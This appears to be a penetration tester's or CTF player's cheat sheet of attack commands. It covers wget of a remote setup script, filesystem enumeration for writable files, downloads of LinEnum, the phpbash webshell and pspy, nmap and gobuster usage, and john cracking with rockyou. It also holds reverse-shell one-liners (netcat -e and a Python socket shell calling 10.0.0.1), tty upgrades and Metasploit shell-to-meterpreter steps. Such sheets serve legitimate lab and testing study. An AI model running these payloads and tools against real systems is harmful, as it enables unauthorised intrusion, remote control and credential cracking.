AUTO SET UP SCRIPT.
wget https://wolffpat.github.io/runDasScripts.sh
#this pulls code from a remote host: give wget an explicit https:// URL (a bare hostname falls back to plain HTTP) and read the script before you run it
#find files writable by the current user. This is a MUST.
find / -type f -writable 2> /dev/null
#find world-writable files (-writable only tests *your* access; -perm -o+w tests the other-write bit)
find / -type f -perm -o+w 2> /dev/null
#find directories writable by the current user
find / -type d -writable 2> /dev/null
#find world-writable directories (other-write bit set)
find / -type d -perm -o+w 2> /dev/null
##using find commands to find specific files (-iname is case-insensitive but matches the whole name; add * wildcards for a substring match)
find / -type f -iname "*string*" 2>/dev/null
##find a directory with a specific name (same wildcard rule as above)
find / -type d -iname "*string*" 2>/dev/null
#hosting a simple Python server to communicate between victim and attacker
#it serves the whole current directory to anyone who can reach the port, so start it from a dedicated directory; binding port 80 needs root (use 8000 or similar otherwise)
--python2--
python -m SimpleHTTPServer 80
--python3--
python3 -m http.server 80    (py -m http.server 80 is the Windows launcher form)
#easy download for LinEnum.sh (an enumeration script for basic priv enum)--
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
#Easy Download for PHPBASH (a powerful webshell with a proper terminal). Remove it from the target when you are done
wget https://raw.githubusercontent.com/Arrexel/phpbash/master/phpbash.php
###NMAP####
-sV = service/version scan (use this to detect what is running on a port)
-sC = default script scan (same as --script=default)
-sP = ping sweep, used for discovering live hosts. This is the deprecated spelling; current nmap uses -sn (host discovery, no port scan)
###stealth snooping tool for watching running processes on a computer without root: PSPY (pinned to v1.2.0; the 64s file is the smaller build)
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
chmod +x pspy64s && ./pspy64s
###NMAPautomator
EASY to use but TAKES SOME TIME; it needs chmod +x and runs nmap for you
wget https://raw.githubusercontent.com/21y4d/nmapAutomator/master/nmapAutomator.sh
###install vulners###
cd /usr/share/nmap/scripts
wget https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/vulners.nse
nmap --script-updatedb     #re-index the script db so --script vulners resolves
#usage: nmap -sV --script vulners <target>   (the script needs -sV version info to look anything up)
##directory brute forcing###
DIRBUSTER IS A COMMON ONE BUT THE GUI ISN'T THE BEST; it is fairly easy to use, however
launch by typing dirbuster into the terminal
####install gobuster####
apt-get install gobuster
#usage: gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt
###JOHN TO CRACK ANYTHING (any hash format it recognises; add --format=... if it misdetects the type)###
john passtocrack.txt --wordlist=/usr/share/wordlists/rockyou.txt
#on Kali the directory is "wordlists" (plural) and rockyou ships compressed: gunzip /usr/share/wordlists/rockyou.txt.gz first
####GTFOBINS####
https://gtfobins.github.io/
###ippsec.rocks###
https://ippsec.rocks/
###SUDO COMMAND LIST####
sudo -l
###adding metasploit modules####
msfdb init
cd $HOME/.msf4
mkdir modules
cd modules
mkdir exploits
cd exploits
mkdir <exploitName>     (the directory tree under ~/.msf4/modules becomes the module path msfconsole shows)
cd <exploitName>
wget exploit
#then in msfconsole: reload_all   so the new module is picked up
#anything placed here is Ruby that msfconsole executes as your user: read third-party modules before loading them
###REVERSE SHELLS BABY!!!####
quick examples (start the listener on the attacker box first: nc -lvnp 1234):
nc -e /bin/sh attacker 1234
#-e is not built into every netcat (openbsd nc lacks it); fall back to the python or bash variants if it is missing
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#replace 10.0.0.1/1234 with the attacker IP and listening port; the same one-liner runs under python3
##FULL LIST OF REVERSE SHELLS####
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
###SPAWNING a tty shell####
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
/bin/bash -i
#for a fully interactive tty afterwards: ctrl Z, then on the attacker run  stty raw -echo; fg  and on the target  export TERM=xterm
###FULL LIST####
https://netsec.ws/?p=337
###how to upgrade from base shell to meterpreter####
get shell in metasploit
ctrl Z (backgrounds the session; msfconsole asks you to confirm)
press y then enter
use post/multi/manage/shell_to_meterpreter
set LHOST to your own address that the target can reach, not the loopback
sessions -l
find your running session number
set SESSION <session number>
run
"Meterpreter session start on session X"
sessions -i X